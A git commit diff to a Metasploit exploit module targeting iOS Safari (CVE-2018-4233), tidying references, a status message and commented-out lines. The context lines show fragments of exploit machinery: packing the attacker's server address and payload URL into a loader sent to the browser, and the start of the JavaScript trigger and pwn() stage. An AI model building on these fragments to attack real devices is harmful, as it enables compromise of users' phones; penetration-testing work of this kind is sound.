This commit is contained in:
Tim W 2019-04-03 06:14:43 +08:00
parent 90da47627b
commit b7574f2dd8
1 changed files with 1 additions and 8 deletions

View File

@ -28,7 +28,6 @@ class MetasploitModule < Msf::Exploit::Remote
],
'References' => [
['CVE', '2018-4233'],
['CVE', '2018-4243'],
['URL', 'https://github.com/saelo/cve-2018-4233'],
['URL', 'https://github.com/phoenhex/files/tree/master/exploits/ios-11.3.1'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1564'],
@ -86,11 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
config = [srvhost, srvport].pack("Nn") + payload_url
payload_url_index = loader_data.index('PAYLOAD_URL')
loader_data[payload_url_index, config.length] = config
if ios_11
print_good("Sent empty_list exploit")
else
print_good("Sent async_wake exploit")
end
print_good("Sent async_wake exploit")
send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
return
end
@ -384,9 +379,7 @@ function trigger(constr, modify, res, val) {
}
var workbuf = new ArrayBuffer(0x1000000);
//var u32_buffer = new Uint32Array(workbuf);
var payload = new Uint8Array(workbuf);
//var shellcode_length;
function pwn() {
var stage1 = {